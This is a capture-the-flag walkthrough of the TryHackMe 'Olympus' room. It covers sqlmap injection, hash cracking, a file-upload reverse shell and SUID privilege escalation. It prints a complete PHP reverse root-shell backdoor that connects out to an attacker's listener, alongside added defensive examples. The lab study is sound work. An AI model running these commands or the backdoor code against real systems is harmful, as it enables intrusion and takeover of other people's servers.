# Olympus

{% embed url="<https://tryhackme.com/room/olympusroom>" %}

## Enumeration

### nmap

```bash
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 61 OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 0a:78:14:04:2c:df:25:fb:4e:a2:14:34:80:0b:85:39 (RSA)
|   256 8d:56:01:ca:55:de:e1:7c:64:04:ce:e6:f1:a5:c7:ac (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHFtzLQXLhGiDzPN7Al84lSfH3jFwGniFL5WQSaIjC+VGMU8mbvbGVuOij+xUAbYarbBuoUagljDmBR5WIRSDeo=
|   256 1f:c1:be:3f:9c:e7:8e:24:33:34:a6:44:af:68:4c:3c (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKhvoRyjZN/taS1uwwTaQ4uZrGhVUje0YWW4jg4rfdXw
80/tcp open  http    syn-ack ttl 61 Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://olympus.thm
Device type: general purpose
Running: Linux 4.X
OS CPE: cpe:/o:linux:linux_kernel:4.15
OS details: Linux 4.15
```

### Web page (port 80)

![](/files/NQvsGJiatZw24m9M5jzF)

### Directory search

<figure><img src="/files/WPCu2P2fjpbl3h3vjA6e" alt=""><figcaption></figcaption></figure>

We found something interesting here, especially `~webmaster`.

#### \~webmaster

As you can see, the page is using Victor CMS, but we don't know the version, so that's not a lead yet.

<figure><img src="/files/WkIpx5Z5dV2dSxZrES0q" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/tydTUVsOISSZLtCx1Lhj" alt=""><figcaption></figcaption></figure>

So why not try the functions the website has? As you can see, there's a login form and a search bar.

Let's capture the request of the search function with **Burp Suite**; you can see the parameters below.

<figure><img src="/files/3PmvFHiQnd1lQVnPeA8L" alt=""><figcaption></figcaption></figure>

### sqlmap

It seems worth trying SQL injection here, since Exploit-DB has records of SQL injection in Victor CMS.

```bash
sqlmap -u "http://olympus.thm/~webmaster/search.php" --data="search=1337*&submit=" --dbs --random-agent -v 3
```

<figure><img src="/files/cCRhzd2godPqHjTkWSN1" alt=""><figcaption></figcaption></figure>

JACKPOT! The SQLi vulnerability is confirmed! Now let's take a look at the `olympus` database.
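To show why the `search` parameter is injectable and what the fix looks like, here is an added example (not code from the room or from Victor CMS): a constructed `posts` table in SQLite, a search function that splices the term into the query like the vulnerable `search.php`, and a parameterised version beside it. Column names and rows are assumptions made up for the demo.

```python
import sqlite3

# Constructed stand-in for the CMS "posts" table; column names are assumptions,
# not the real Victor CMS schema.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE posts (post_id INTEGER, post_title TEXT, post_status TEXT)")
    conn.executemany(
        "INSERT INTO posts VALUES (?, ?, ?)",
        [(1, "Welcome to Olympus", "published"),
         (2, "Prometheus brings fire", "published"),
         (3, "Draft: unpublished plans", "draft")],
    )
    return conn

def search_vulnerable(conn: sqlite3.Connection, term: str) -> list:
    # The POSTed search term is spliced straight into the SQL text, which is
    # the defect sqlmap found on search.php: a quote in the term ends the
    # string literal and everything after it is parsed as SQL.
    sql = ("SELECT post_title FROM posts WHERE post_status = 'published' "
           f"AND post_title LIKE '%{term}%'")
    return [row[0] for row in conn.execute(sql)]

def search_safe(conn: sqlite3.Connection, term: str) -> list:
    # Parameterised query: the term is bound as data and never parsed as SQL,
    # so the published-only filter cannot be bypassed.
    sql = ("SELECT post_title FROM posts WHERE post_status = 'published' "
           "AND post_title LIKE ?")
    return [row[0] for row in conn.execute(sql, (f"%{term}%",))]
```

With a normal term both functions return the same row; with a term containing a quote, only the spliced version lets the unpublished draft leak.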

```bash
sqlmap -u "http://olympus.thm/~webmaster/search.php" --data="search=1337*&submit=" -D olympus --dump --dbs --random-agent -v 3 --batch
```

<figure><img src="/files/eWRkNi04iqc85ifP3Fg8" alt=""><figcaption><p>posts</p></figcaption></figure>

<figure><img src="/files/RD0Hjn6IL2kqe7nU1FiT" alt=""><figcaption><p>comments</p></figcaption></figure>

<figure><img src="/files/YRWSlvNpbApcxa7xkzqs" alt=""><figcaption><p>chats</p></figcaption></figure>

<figure><img src="/files/5w0do3RPBfrJiad1U3M6" alt="" width="252"><figcaption><p>categories</p></figcaption></figure>

<figure><img src="/files/JBg3LRnJfbtIuG6F2YHh" alt=""><figcaption><p>users</p></figcaption></figure>

You will see the flag somewhere if you dump the whole database.

So now we have a clear picture of the database. Crucially, we have a table with users and their password hashes, so let's crack the passwords.

```text
+---------+----------+------------+-----------+------------------------+------------+---------------+--------------------------------------------------------------+----------------+
| user_id | randsalt | user_name  | user_role | user_email             | user_image | user_lastname | user_password                                                | user_firstname |
+---------+----------+------------+-----------+------------------------+------------+---------------+--------------------------------------------------------------+----------------+
| 3       | <blank>  | prometheus | User      | prometheus@olympus.thm | <blank>    | <blank>       | $2y$10$YC6uoMwK9VpB5QL513vfLu1RV2sgBf01c0lzPHcz1qK2EArDvnj3C | prometheus     |
| 6       | dgas     | root       | Admin     | root@chat.olympus.thm  | <blank>    | <blank>       | $2y$10$lcs4XWc5yjVNsMb4CUBGJevEkIuWdZN3rsuKWHCc.FGtapBAfW.mK | root           |
| 7       | dgas     | zeus       | User      | zeus@chat.olympus.thm  | <blank>    | <blank>       | $2y$10$cpJKDXh2wlAI5KlCsUaLCOnf0g5fiG0QSUS53zp/r0HMtaj6rT4lC | zeus           |
+---------+----------+------------+-----------+------------------------+------------+---------------+--------------------------------------------------------------+----------------+
```

#### Cracking with hashcat

These hashes look like `bcrypt $2*$, Blowfish (Unix)`, which is hashcat mode 3200. You can compare them against the example hashes here: <https://hashcat.net/wiki/doku.php?id=example_hashes>

```bash
hashcat -m 3200 hash.txt /usr/share/wordlists/rockyou.txt
```

I've tried to crack all the hashes, but only one of them is crackable, which is Prometheus's hash.

<figure><img src="/files/LpivLzdv9ROc1ESKkBzu" alt=""><figcaption></figcaption></figure>

Let's take the creds and try to log in as Prometheus. Sick, now we are one of the gods, lol.

<figure><img src="/files/5Wu5HvR9nAOyciMU8djX" alt=""><figcaption></figcaption></figure>

From here I can't really find anything, but remember the `chats` table in the **olympus** database from the sqlmap dump, with `chat.olympus.thm` in the e-mail addresses? That might be a subdomain, so I use ffuf to confirm it.

### ffuf

```bash
ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://10.10.41.229 -H "Host: FUZZ.olympus.thm" -r -fs 1948,1950
```

<figure><img src="/files/8iNzSLyu0Vgyuwv0jC8N" alt=""><figcaption></figcaption></figure>

So we found another login page, and this time it is a chat application. I used the same creds as Prometheus and it worked.

<figure><img src="/files/gB2F3x7TPvYoQqzAedBa" alt=""><figcaption></figcaption></figure>

Cool, so it looks like we can upload files here, and you know what time it is: reverse shell time.

<figure><img src="/files/PBBVv9O0hkw7ffMuceom" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/mS5m2girdnYBYI9oYF8f" alt=""><figcaption></figcaption></figure>

But when I uploaded the file it was nowhere to be found. Looking back at the `chats` table, I found that the application takes the file and renames it to absolute gibberish.

<figure><img src="/files/0AKVZwZ1aL3tYdHQKiZJ" alt=""><figcaption></figcaption></figure>

Let's check whether that's really the case, and oh boy, yes. Now we have to find our file and access it to invoke the reverse shell.

<figure><img src="/files/i9okDd5tHnRNAoSNjjGp" alt=""><figcaption></figcaption></figure>

#### sqlmap on the chats table

```bash
sqlmap -u "http://olympus.thm/~webmaster/search.php" --data="search=1337*&submit=" -D olympus --dump -T chats --batch --fresh-queries
```

`--dump` on its own reuses the rows cached in sqlmap's session file from the earlier run, so it won't show the newly uploaded files; `--fresh-queries` ignores the cache and queries the database again.

<figure><img src="/files/BVXns65qkTlr6yEZ1Hfh" alt=""><figcaption></figcaption></figure>

And oh boy, I uploaded a ton of files, lol. Just take one of the files and invoke it.

### Reverse shell

Now we're in as www-data; let's try to escalate our privileges.

<figure><img src="/files/VlhWPb92Or4DuAoar5nG" alt=""><figcaption></figcaption></figure>

#### SUID

The first thing to do here is to find what might be vulnerable, and my go-to is to check the SUID binaries.

We found **cputils**, which is vulnerable: <https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/#cputils>

<figure><img src="/files/5MVmMH36zYEIGLM83DpA" alt=""><figcaption></figcaption></figure>

Now let's see if we can become Zeus, since he can run sudo. Here we found his **.ssh** directory; he might store his private key there.

<figure><img src="/files/oFoEAo8ITeKhuRMtQrhb" alt=""><figcaption><p>exploiting SUID</p></figcaption></figure>

### ssh2john

Here we use ssh2john to convert the key into a hash that John can crack, so we can recover the passphrase and log in with the key.

```bash
ssh2john id_rsa > zeus.txt
```

<figure><img src="/files/SPBTViCrktf1YnbtFFVz" alt=""><figcaption><p>getting passphrase</p></figcaption></figure>

<figure><img src="/files/IY6XjP6G5xtTDCFUmn28" alt=""><figcaption><p>login as Zeus</p></figcaption></figure>

### linpeas

Here we use linpeas to look for vulnerable components on the system, but it finds nothing useful.

### Privilege escalation

Let's check what the groups we belong to (adm and zeus) can access, read or write.

```bash
find / -group adm 2>/dev/null    # nothing
find / -group zeus 2>/dev/null
```

I found a file that's really unusual: it's a shell executed by root. To confirm, simply use `ls -la file.php`.

<figure><img src="/files/QXJXzsfSDYFDesqQG2Sw" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/rqR3nu9nxRQOja3uX2cz" alt=""><figcaption></figcaption></figure>

#### The code:

```php
<?php
// Hard-coded password gating the backdoor; without it only the form is shown.
$pass = "a7c5ffcf139742f52a5267c4a0674129";
if(!isset($_POST["password"]) || $_POST["password"] != $pass) die('<form name="auth" method="POST">Password: <input type="password" name="password" /></form>');

set_time_limit(0);

$host = htmlspecialchars("$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]", ENT_QUOTES, "UTF-8");
if(!isset($_GET["ip"]) || !isset($_GET["port"])) die("<h2><i>snodew reverse root shell backdoor</i></h2><h3>Usage:</h3>Locally: nc -vlp [port]</br>Remote: $host?ip=[destination of listener]&port=[listening port]");
$ip = $_GET["ip"]; $port = $_GET["port"];

$write_a = null;
$error_a = null;

// The "shell" it spawns is a SUID binary disguised as a libc shared object.
$suid_bd = "/lib/defended/libc.so.99";
$shell = "uname -a; w; $suid_bd";

chdir("/"); umask(0);
// Connect back to the listener given in the query string.
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if(!$sock) die("couldn't open socket");

// Spawn the command with stdin/stdout/stderr as pipes, then relay them over the socket.
$fdspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));
$proc = proc_open($shell, $fdspec, $pipes);

if(!is_resource($proc)) die();

for($x=0;$x<=2;$x++) stream_set_blocking($pipes[$x], 0);
stream_set_blocking($sock, 0);

while(1)
{
    if(feof($sock) || feof($pipes[1])) break;
    $read_a = array($sock, $pipes[1], $pipes[2]);
    $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
    if(in_array($sock, $read_a)) { $i = fread($sock, 1400); fwrite($pipes[0], $i); }
    if(in_array($pipes[1], $read_a)) { $i = fread($pipes[1], 1400); fwrite($sock, $i); }
    if(in_array($pipes[2], $read_a)) { $i = fread($pipes[2], 1400); fwrite($sock, $i); }
}

fclose($sock);
for($x=0;$x<=2;$x++) fclose($pipes[$x]);
proc_close($proc);
?>
```

See these lines:

`$suid_bd = "/lib/defended/libc.so.99";`

`$shell = "uname -a; w; $suid_bd";`

These are the key to getting root: the backdoor runs `/lib/defended/libc.so.99` as its shell, and the variable name tells us it is a SUID backdoor binary. So I just ran that command myself, and now we are root.
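From the defender's side, the two halves of this backdoor (a PHP file that pairs a connect-back socket with a spawned process, and a setuid "library" under `/lib`) are easy to triage for. The following is an added example, not the room's or the backdoor author's code: a small scanner that flags PHP files combining a socket function with a process-execution function, pulls out any `/lib/*.so*` paths they reference, and checks whether such a path carries the setuid bit. The fixture files it scans are constructed inline; the regex lists are my own choice of functions.

```python
import re
import stat
import tempfile
from pathlib import Path
from typing import Optional

# PHP built-ins that, combined, give a network-reachable shell exactly as the
# snodew backdoor does: a socket to a listener plus a process wired to it.
SOCKET_FUNCS = re.compile(r"\b(fsockopen|stream_socket_client|socket_create)\s*\(")
EXEC_FUNCS = re.compile(r"\b(proc_open|popen|shell_exec|passthru|exec|system)\s*\(")
# Quoted absolute paths under /lib ending in .so[.N]: a "shared object" that a
# script runs as a command is the SUID half of the backdoor.
LIB_PATH = re.compile(r"[\"'](/lib[^\"']*\.so[.\d]*)[\"']")

def scan_php_file(path: Path) -> Optional[dict]:
    text = path.read_text(errors="ignore")
    if not (SOCKET_FUNCS.search(text) and EXEC_FUNCS.search(text)):
        return None
    return {"file": path.name, "lib_paths": LIB_PATH.findall(text)}

def scan_webroot(root: Path) -> list:
    # Walk the web root and report every PHP file matching both patterns.
    hits = []
    for php in sorted(root.rglob("*.php")):
        hit = scan_php_file(php)
        if hit:
            hits.append(hit)
    return hits

def is_setuid(path) -> bool:
    # True when the referenced "library" is really a setuid executable.
    try:
        return bool(Path(path).stat().st_mode & stat.S_ISUID)
    except FileNotFoundError:
        return False

# Constructed fixtures: a stripped-down copy of the backdoor above, and a
# script that only calls system(), which on its own is not a backdoor signal.
SAMPLE_BACKDOOR = '''<?php
$suid_bd = "/lib/defended/libc.so.99";
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
$proc = proc_open("uname -a; w; $suid_bd", $fdspec, $pipes);
?>'''
SAMPLE_BENIGN = "<?php echo system('date'); ?>"

def demo() -> list:
    # Build a throwaway web root in a temp dir, scan it, and return the findings.
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "file.php").write_text(SAMPLE_BACKDOOR)
        (root / "index.php").write_text(SAMPLE_BENIGN)
        return scan_webroot(root)
```

On a real host, feed every path the scanner reports to `is_setuid` and treat any setuid file under `/lib` as a finding in its own right.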

<figure><img src="/files/AbssHwIZbp4yZzjJCWAK" alt=""><figcaption><p>root privilege</p></figcaption></figure>

### flags

Where are the flags? Use **grep** with a pattern.

The command can be: `grep -irl flag{`

* `i`: Makes the search case-insensitive.
* `r`: Recursively searches subdirectories.
* `l`: Only lists the names of files that contain a match, instead of the matching lines themselves.

<figure><img src="/files/EafJgHKEZBZ48KWdjM1F" alt=""><figcaption><p>finding flags</p></figcaption></figure>
